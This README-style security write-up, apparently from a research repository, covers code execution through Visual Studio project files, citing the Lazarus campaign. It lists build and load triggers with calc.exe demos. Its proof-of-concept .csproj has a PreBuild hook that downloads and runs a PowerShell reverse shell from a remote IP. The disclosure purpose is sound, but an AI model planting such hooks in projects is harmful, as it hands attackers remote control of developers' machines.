VisualStudio

Using code projects for phishing attacks is not a new concept. In early 2021, the Lazarus APT group employed a specific attack technique in their campaign targeting security researchers: they embedded malicious event commands within Visual Studio project files, allowing harmful code to execute when the project is compiled, as detailed in [New campaign targeting security researchers](https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/).

This incident has once again brought the security of Visual Studio into the public eye. However, it is important to note that Visual Studio is not the only product with such risks. JetBrains' IDEs, VSCode, and other text editors also face similar vulnerabilities when opening unsafe projects. As a response, these products have introduced trust zone mechanisms that disable certain risky functionalities in untrusted environments, aiming to protect their users.

In this repository, we present a new exploitation technique for Visual Studio projects **(Microsoft considers it not to be a security issue)** and provide a proof of concept. Our intention is to raise awareness about the potential risks involved and help individuals avoid being hacked.

Here are some publicly disclosed methods for exploiting Visual Studio:

PreBuildEvent: Executes arbitrary commands before project compilation.

```xml
<PreBuildEvent>
    <Command>
    cmd /c calc
    </Command>
</PreBuildEvent>
```

GetFrameworkPaths Target: Triggered when viewing code.

```xml
<Target Name="GetFrameworkPaths">
    <Exec Command="calc.exe"/>
</Target>
```

COMFileReference: Triggered when loading the TypeLib during project opening.

```xml
<COMFileReference Include="files\helpstringdll.tlb">
     <EmbedInteropTypes>True</EmbedInteropTypes>
</COMFileReference>
```

Example exploit using PreBuildEvent:

Visual.sln:

```

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.7.34031.279
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Visual", "Visual.csproj", "{A408C004-8817-4960-BF22-4E7AB8AA1974}"
EndProject
Global
    GlobalSection(SolutionConfigurationPlatforms) = preSolution
        Debug|Any CPU = Debug|Any CPU
        Release|Any CPU = Release|Any CPU
    EndGlobalSection
    GlobalSection(ProjectConfigurationPlatforms) = postSolution
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Debug|Any CPU.Build.0 = Debug|Any CPU
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Release|Any CPU.ActiveCfg = Release|Any CPU
        {A408C004-8817-4960-BF22-4E7AB8AA1974}.Release|Any CPU.Build.0 = Release|Any CPU
    EndGlobalSection
    GlobalSection(SolutionProperties) = preSolution
        HideSolutionNode = FALSE
    EndGlobalSection
    GlobalSection(ExtensibilityGlobals) = postSolution
        SolutionGuid = {D24BD630-7BA0-46EB-A66C-8723E99703FC}
    EndGlobalSection
EndGlobal
```

And a Visual.csproj file:

```xml
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
    <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
        <Exec Command="powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.26:8000/revshell.ps1')" />
    </Target>

</Project>
```

Just before the project build starts, the command contained in the .csproj file is executed (here, downloading and running a PowerShell reverse shell).